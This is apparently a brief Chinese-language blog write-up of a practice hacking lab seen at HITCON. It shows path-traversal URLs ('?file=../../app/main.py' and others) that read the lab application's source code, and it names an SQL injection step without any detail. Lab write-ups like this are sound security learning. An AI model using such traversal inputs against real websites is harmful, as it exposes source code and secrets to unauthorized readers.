前言
這個Lab是在HITCON攤位上看到的,當時沒時間解,回來解解看,順便寫個writeup。
Writeup
任意讀取
- 這是圖片的連結,可以任意讀取在?file=的地方
https://lab.hackersir.org/uploads?file=b87eedddb23f4993bbc8f25a0def05d2
有這些source code
https://lab.hackersir.org/uploads?file=../../app/main.py https://lab.hackersir.org/uploads?file=../../app/api/cart.py https://lab.hackersir.org/uploads?file=../../app/api/item.py
- 有一個像flag
SQLI
End
我覺得是一個有趣的小靶機,但是不知道還有沒有其他可以攻擊的地方。
Comments powered by Disqus.